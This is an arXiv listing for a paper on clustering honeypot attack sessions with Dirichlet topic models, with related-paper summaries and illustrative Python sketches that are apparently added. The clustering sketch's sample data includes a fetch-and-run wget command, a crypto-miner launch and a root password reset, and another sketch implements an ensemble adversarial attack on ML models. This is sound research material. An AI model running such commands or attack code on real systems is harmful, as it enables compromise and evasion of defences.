Nested Dirichlet models for unsupervised attack pattern detection in honeypot data
- URL: http://arxiv.org/abs/2301.02505v3
- Date: Sun, 22 Sep 2024 21:05:36 GMT
- Title: Nested Dirichlet models for unsupervised attack pattern detection in honeypot data
- Authors: Francesco Sanna Passino, Anastasia Mantziou, Daniyar Ghani, Philip Thiede, Ross Bevington, Nicholas A. Heard
- Abstract summary: Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts.
This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots.
The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers.
- Score: 0.0
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: Cyber-systems are under near-constant threat from intrusion attempts. Attack types vary, but each attempt typically has a specific underlying intent, and the perpetrators are typically groups of individuals with similar objectives. Clustering attacks appearing to share a common intent is very valuable to threat-hunting experts. This article explores Dirichlet distribution topic models for clustering terminal session commands collected from honeypots, which are special network hosts designed to entice malicious attackers. The main practical implications of clustering the sessions are two-fold: finding similar groups of attacks, and identifying outliers. A range of statistical models are considered, adapted to the structures of command-line syntax. In particular, concepts of primary and secondary topics, and then session-level and command-level topics, are introduced into the models to improve interpretability. The proposed methods are further extended in a Bayesian nonparametric fashion to allow unboundedness in the vocabulary size and the number of latent intents. The methods are shown to discover an unusual MIRAI variant which attempts to take over existing cryptocurrency coin-mining infrastructure, and which is not detected by traditional topic-modelling approaches.
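To make the clustering pipeline described in the abstract concrete, the following is a minimal sketch using a standard LDA topic model from scikit-learn rather than the nested Dirichlet models proposed in the paper: each session is treated as a bag of command tokens, assigned to its dominant topic, and scored as a potential outlier when its dominant topic is weak. The example sessions, tokeniser, and hyperparameters are illustrative assumptions, not the paper's data or settings.

```python
# Minimal illustrative sketch (not the paper's nested Dirichlet model): cluster
# honeypot terminal sessions with a plain LDA topic model and flag sessions
# whose dominant topic is weak as potential outliers. Sessions are invented.
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

sessions = [
    "wget http://x/mal.sh; chmod +x mal.sh; ./mal.sh",
    "cat /proc/cpuinfo; uname -a; nproc",
    "wget http://y/miner; ./miner --pool pool.example:3333",
    "echo root:pass | chpasswd; service ssh restart",
]

# Bag-of-words over command tokens; the pattern keeps flags and paths intact.
vectoriser = CountVectorizer(token_pattern=r"[^\s;|&]+")
X = vectoriser.fit_transform(sessions)

# Vanilla LDA with symmetric Dirichlet priors over topics and words.
lda = LatentDirichletAllocation(n_components=2, doc_topic_prior=0.1,
                                topic_word_prior=0.1, random_state=0)
theta = lda.fit_transform(X)             # session-level topic proportions

clusters = theta.argmax(axis=1)          # dominant topic = cluster label
outlier_score = 1.0 - theta.max(axis=1)  # weak dominant topic -> possible outlier
for s, c, o in zip(sessions, clusters, outlier_score):
    print(f"cluster={c} outlier_score={o:.2f}  {s[:40]}")
```

The paper's models go beyond this baseline by distinguishing primary/secondary and session-level/command-level topics and by allowing unbounded vocabularies and numbers of latent intents; the sketch only illustrates the basic bag-of-commands clustering and outlier-scoring step.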
Related papers
- BoBa: Boosting Backdoor Detection through Data Distribution Inference in Federated Learning [26.714674251814586]
Federated learning is susceptible to poisoning attacks due to its decentralized nature.
We propose a novel distribution-aware anomaly detection mechanism, BoBa, to address this problem.
arXiv Detail & Related papers (2024-07-12T19:38:42Z)
- Ensemble-based Blackbox Attacks on Dense Prediction [16.267479602370543]
We show that a carefully designed ensemble can create effective attacks for a number of victim models.
In particular, we show that normalization of the weights for individual models plays a critical role in the success of the attacks.
Our proposed method can also generate a single perturbation that can fool multiple blackbox detection and segmentation models simultaneously (a hedged sketch of the weighted-ensemble idea follows this entry).
arXiv Detail & Related papers (2023-03-25T00:08:03Z)
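Relating to the ensemble-attack entry above: a hedged sketch of a weighted-ensemble PGD-style attack in PyTorch, where per-model losses are combined with normalised weights before each gradient step. A plain classification cross-entropy is used for brevity (the paper targets dense prediction), and the models, weights, and budgets are placeholder assumptions, not the authors' procedure.

```python
# Hedged sketch of a weighted-ensemble PGD attack: per-model losses are combined
# with normalised weights before the gradient step. Models, weights and the
# epsilon budget are placeholders, not the paper's exact method.
import torch
import torch.nn.functional as F

def ensemble_pgd(models, weights, x, y, eps=8/255, alpha=2/255, steps=10):
    w = torch.tensor(weights, dtype=torch.float32)
    w = w / w.sum()                      # weight normalisation highlighted by the paper
    x_adv = x.clone().detach()
    for _ in range(steps):
        x_adv.requires_grad_(True)
        loss = sum(wi * F.cross_entropy(m(x_adv), y) for wi, m in zip(w, models))
        grad = torch.autograd.grad(loss, x_adv)[0]
        x_adv = x_adv.detach() + alpha * grad.sign()
        x_adv = x.clone() + (x_adv - x).clamp(-eps, eps)   # project to L_inf ball
        x_adv = x_adv.clamp(0, 1)
    return x_adv.detach()
```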
- On the Robustness of Deep Clustering Models: Adversarial Attacks and Defenses [14.951655356042947]
Clustering models constitute a class of unsupervised machine learning methods which are used in a number of application pipelines.
We propose a blackbox attack using Generative Adversarial Networks (GANs) where the adversary does not know which deep clustering model is being used.
We analyze our attack against multiple state-of-the-art deep clustering models and real-world datasets, and find that it is highly successful.
arXiv Detail & Related papers (2022-10-04T22:32:02Z)
- Towards A Conceptually Simple Defensive Approach for Few-shot Classifiers Against Adversarial Support Samples [107.38834819682315]
We study a conceptually simple approach to defend few-shot classifiers against adversarial attacks.
We propose a simple attack-agnostic detection method, using the concept of self-similarity and filtering.
Our evaluation on the miniImagenet (MI) and CUB datasets exhibits good attack detection performance (a hedged sketch of a self-similarity filter follows this entry).
arXiv Detail & Related papers (2021-10-24T05:46:03Z)
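Relating to the few-shot defence entry above: one way to read "self-similarity and filtering" is to score each support sample by its similarity to the other supports of its claimed class and drop low-scoring ones. The sketch below is an assumption-laden illustration of that reading, not the authors' detection method; the cosine similarity and threshold are invented.

```python
# Hedged sketch of a self-similarity filter: within each claimed class, score each
# support embedding by its mean cosine similarity to the other supports of that
# class and drop low-scoring ones as suspected adversarial samples.
import numpy as np

def filter_supports(embeddings, labels, threshold=0.5):
    """embeddings: (n, d) support embeddings; labels: (n,) class labels."""
    normed = embeddings / np.linalg.norm(embeddings, axis=1, keepdims=True)
    keep = np.ones(len(labels), dtype=bool)
    for c in np.unique(labels):
        idx = np.where(labels == c)[0]
        sims = normed[idx] @ normed[idx].T                 # pairwise cosine similarity
        mean_sim = (sims.sum(axis=1) - 1.0) / max(len(idx) - 1, 1)
        keep[idx] = mean_sim >= threshold                  # singleton classes always fail here;
    return keep                                            # purely illustrative behaviour
```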
- Attack to Fool and Explain Deep Networks [59.97135687719244]
We counter-argue by providing evidence of human-meaningful patterns in adversarial perturbations.
Our major contribution is a novel pragmatic adversarial attack that is subsequently transformed into a tool to interpret the visual models.
arXiv Detail & Related papers (2021-06-20T03:07:36Z)
- Towards Defending against Adversarial Examples via Attack-Invariant Features [147.85346057241605]
Deep neural networks (DNNs) are vulnerable to adversarial noise.
Adversarial robustness can be improved by exploiting adversarial examples.
Models trained on seen types of adversarial examples generally cannot generalize well to unseen types of adversarial examples.
arXiv Detail & Related papers (2021-06-09T12:49:54Z)
- ExAD: An Ensemble Approach for Explanation-based Adversarial Detection [17.455233006559734]
We propose ExAD, a framework to detect adversarial examples using an ensemble of explanation techniques.
We evaluate our approach using six state-of-the-art adversarial attacks on three image datasets.
arXiv Detail & Related papers (2021-03-22T00:53:07Z)
- Hidden Backdoor Attack against Semantic Segmentation Models [60.0327238844584]
The backdoor attack intends to embed hidden backdoors in deep neural networks (DNNs) by poisoning training data.
We propose a novel attack paradigm, the fine-grained attack, in which the target label is treated at the object level instead of the image level.
Experiments show that the proposed methods can successfully attack semantic segmentation models by poisoning only a small proportion of training data.
arXiv Detail & Related papers (2021-03-06T05:50:29Z)
- Learning to Separate Clusters of Adversarial Representations for Robust Adversarial Detection [50.03939695025513]
We propose a new probabilistic adversarial detector motivated by a recently introduced non-robust feature.
In this paper, we consider non-robust features as a common property of adversarial examples, and deduce that it is possible to find a cluster in representation space corresponding to this property.
This idea leads us to estimate the probability distribution of adversarial representations in a separate cluster, and to leverage that distribution for a likelihood-based adversarial detector (a hedged sketch follows this entry).
arXiv Detail & Related papers (2020-12-07T07:21:18Z)
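Relating to the entry above on separating clusters of adversarial representations: a hedged sketch of the likelihood idea, fitting a single Gaussian to representations of known adversarial examples and flagging inputs whose representations are likely under that fit. The Gaussian form, the covariance regularisation, and the threshold are assumptions for illustration, not the paper's estimator.

```python
# Hedged sketch of a likelihood-based detector: fit a Gaussian to representations
# of known adversarial examples and flag new inputs whose representation has high
# likelihood under that fit. Inputs and threshold are placeholders.
import numpy as np
from scipy.stats import multivariate_normal

def fit_adversarial_cluster(adv_reps):
    """adv_reps: (n, d) array of representations of known adversarial examples."""
    mu = adv_reps.mean(axis=0)
    cov = np.cov(adv_reps, rowvar=False) + 1e-6 * np.eye(adv_reps.shape[1])
    return multivariate_normal(mean=mu, cov=cov)

def is_adversarial(rep, adv_dist, threshold):
    # Flag as adversarial when the representation is likely under the
    # adversarial-cluster distribution.
    return adv_dist.logpdf(rep) > threshold
```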
- Adversarial Attack and Defense of Structured Prediction Models [58.49290114755019]
In this paper, we investigate attacks and defenses for structured prediction tasks in NLP.
The structured output of structured prediction models is sensitive to small perturbations in the input.
We propose a novel and unified framework that learns to attack a structured prediction model using a sequence-to-sequence model.
arXiv Detail & Related papers (2020-10-04T15:54:03Z)
- Gradient-based adversarial attacks on categorical sequence models via traversing an embedded world [11.711134497239332]
We consider adversarial attacks on deep learning models with categorical sequences.
We handle these challenges using two black-box adversarial attacks.
Results for money transactions, medical fraud, and NLP datasets suggest that the proposed methods generate reasonable adversarial sequences (a hedged sketch of the embedded-space idea follows this entry).
arXiv Detail & Related papers (2020-03-09T14:31:36Z)
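Relating to the entry above on attacking categorical sequence models: a hedged sketch of the "traversing an embedded world" idea, in which a token's embedding is moved along an adversarial direction and then snapped back to the nearest real token. The embedding matrix, the perturbation direction, and the single-position edit are illustrative assumptions, not the authors' two black-box attacks.

```python
# Hedged sketch of the embedded-space idea: nudge a token's embedding along a
# direction that increases the model's loss, then snap back to the nearest real
# vocabulary token. Embedding matrix and direction are placeholders.
import numpy as np

def nearest_token(vec, embedding_matrix):
    # embedding_matrix: (vocab_size, d); returns the index of the closest embedding.
    dists = np.linalg.norm(embedding_matrix - vec, axis=1)
    return int(dists.argmin())

def perturb_position(tokens, pos, direction, step, embedding_matrix):
    """Replace tokens[pos] by the vocabulary item nearest to its embedding moved
    by step * direction (the direction could come from a surrogate model's
    gradient or a black-box estimate)."""
    moved = embedding_matrix[tokens[pos]] + step * direction
    new_tokens = list(tokens)
    new_tokens[pos] = nearest_token(moved, embedding_matrix)
    return new_tokens
```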
This list is automatically generated from the titles and abstracts of the papers on this site.